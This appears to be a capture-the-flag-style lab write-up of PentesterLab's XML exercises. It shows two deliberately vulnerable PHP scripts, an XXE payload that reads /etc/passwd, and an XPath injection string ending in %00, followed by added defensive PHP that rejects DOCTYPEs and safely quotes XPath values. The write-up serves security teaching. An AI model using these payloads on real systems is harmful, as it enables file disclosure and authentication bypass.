Pentesterlab--Web for Pentester-XML

Web for Pentester: This exercise is a set of the most common web vulnerabilities

Difficulty: 1/5

OWASP: Testing for XML Injection

Example 1

code review

example1.php
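<?php
  // User-controlled XML from the query string is parsed as-is, DOCTYPE and entities included
  $xml=simplexml_load_string($_GET['xml']);
  // The root element's text, with any expanded entity, is echoed back to the client
  print_r((string)$xml);
?>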

XML injection point search:

Add this fuzzing wordlist to ZAP:

https://wfuzz.googlecode.com/svn/trunk/wordlist/Injections/XML.txt

exploit:

http://192.168.79.162/xml/example1.php?xml=<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>

The payload <!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo> needs to be URL-encoded before it is sent in the xml parameter.

Example 2

code review

example2.php
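<?php
  // Static XML document that acts as the user store
  $x = "<data><users><user><name>hacker</name><message>Hello hacker</message><password>pentesterlab</password></user><user><name>admin</name><message>Hello admin</message><password>s3cr3tP4ssw0rd</password></user></users></data>";

  $xml=simplexml_load_string($x);
  // Injection point: $_GET['name'] is concatenated into the XPath expression unescaped
  $xpath = "users/user/name[.='".$_GET['name']."']/parent::*/message";
  $res = ($xml->xpath($xpath));
  // foreach replaces each(), which was removed in PHP 8; the output is the same
  foreach ($res as $node) {
      echo $node;
  }
?>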

exploit:

http://192.168.79.162/xml/example2.php?name=' or 1=1]%00
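
Mitigation for both examples, as an added example that is not part of the PentesterLab exercise or the original write-up: a parser wrapper for example1.php that refuses DOCTYPE declarations, and an XPath string-literal builder for example2.php. The function names parse_untrusted_xml, xpath_literal and find_messages are hypothetical, and the sample document is constructed.

```php
<?php
// Added example, not PentesterLab's code; function names are hypothetical.
// Example 1: parse without entity substitution or network access and
// refuse any document that declares a DOCTYPE.
function parse_untrusted_xml(string $raw): ?SimpleXMLElement
{
    if ($raw === '') {
        return null;
    }
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true); // matters with libxml2 older than 2.9
    }
    $prev = libxml_use_internal_errors(true);
    $dom = new DOMDocument();
    $ok = $dom->loadXML($raw, LIBXML_NONET); // no LIBXML_NOENT, no LIBXML_DTDLOAD
    libxml_use_internal_errors($prev);
    if (!$ok || $dom->doctype !== null) {
        return null;
    }
    return simplexml_import_dom($dom);
}

// Example 2: XPath 1.0 has no escape character, so build a string literal
// that the value cannot break out of.
function xpath_literal(string $value): string
{
    if (strpos($value, "\0") !== false) {
        throw new InvalidArgumentException('NUL byte in XPath value');
    }
    if (strpos($value, "'") === false) {
        return "'" . $value . "'";
    }
    if (strpos($value, '"') === false) {
        return '"' . $value . '"';
    }
    return "concat('" . implode("', \"'\", '", explode("'", $value)) . "')";
}

function find_messages(SimpleXMLElement $xml, string $name): array
{
    $nodes = $xml->xpath('users/user/name[.=' . xpath_literal($name) . ']/parent::*/message');
    return array_map('strval', $nodes ?: []);
}

// Constructed sample data with the same shape as the document in example2.php.
$xml = parse_untrusted_xml('<data><users><user><name>hacker</name><message>Hello hacker</message></user></users></data>');
var_dump(find_messages($xml, 'hacker'));    // ordinary lookup
var_dump(find_messages($xml, "' or 1=1]")); // quote-bearing input is compared as a literal name
var_dump(parse_untrusted_xml('<!DOCTYPE foo [<!ENTITY e "x">]><foo>&e;</foo>')); // DOCTYPE is refused
```

Rejecting a NUL byte outright matters here because the example 2 request relies on %00 to cut off the rest of the XPath expression.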